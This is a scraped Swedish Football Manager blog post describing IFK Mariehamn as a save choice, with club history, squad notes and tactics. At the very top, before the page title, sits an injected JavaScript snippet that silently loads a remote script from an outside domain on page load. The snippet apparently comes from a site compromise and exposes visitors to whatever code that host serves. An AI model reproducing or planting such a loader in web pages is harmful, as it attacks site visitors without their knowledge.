;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: IFK Mariehamn – FMSweden
Meny Stäng

Veckans inspiration: IFK Mariehamn

Som ni kanske har märkt så är jag svag för geografiska motiveringar till lagval och denna vecka utgör inget undantag. Det handlar nämligen om Ålands stolthet – IFK Mariehamn – som spelat i den finska högstaligan Veikkausliiga sedan 2005. Klubben grundades 1919 och fotbollssektionen sexton år därefter. De främsta meriterna är en ligatitel 2016 och en cuptitel från året dessförinnan, vilket får ses som lite sensationellt ändå. Mariehamns Idrottspark har en kapacitet på 1800 åskådare, så det är ingen jättearena direkt. Träningsanläggningen är dock bra vilket får ses som ett gott betyg.

På FM är klubben tippad någonstans plats 8-10 av 12 lag i serien där jumbon åker ur och nästjumbon får kvala. Styrelsen begär en plats på övre halvan, vilket blir en utmaning men ändå en ganska rimlig förväntan. HJK och SJK blir förstås svåra att rå på i toppen, men i övrigt finns det goda chanser. I truppen återfinns allsvenska favoriter som Mohammed Abubakari (Åtvidaberg, Helsingborg, Häcken) och Kennedy Igboananike (AIK, Djurgården, Örebro, Sirius) samt svenske mittbacken Calle Svensson som senast tillhörde Västerås SK i några säsonger.  Annars är seniortruppen vid start den största jag skådat på FM med hela 56 (!) spelare. Mycket dökött, helt klart. När jag rensat bort alla som endast har två stjärnor i nuvarande förmåga enligt assisterande (trubbigt mått, jag vet, men ändå) så återstår endast nitton spelare. Kvalitetsmässigt då? Jodå, en 4-4-2 ser ut att passa spelarmaterialet bra och då får man ihop en ganska bra elva sett till nivån, där de tre ovannämnda spelare utgör centrallinjen. Klubben har förlorat samtliga kval i Europa hittills, så kan du bli den första att lyckas med bedriften att vinna ett dubbelmöte mot kontinentalt motstånd? Det vore onekligen en merit för ditt CV. Lycka till med saven!

 

Logo of IFK Mariehamn

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar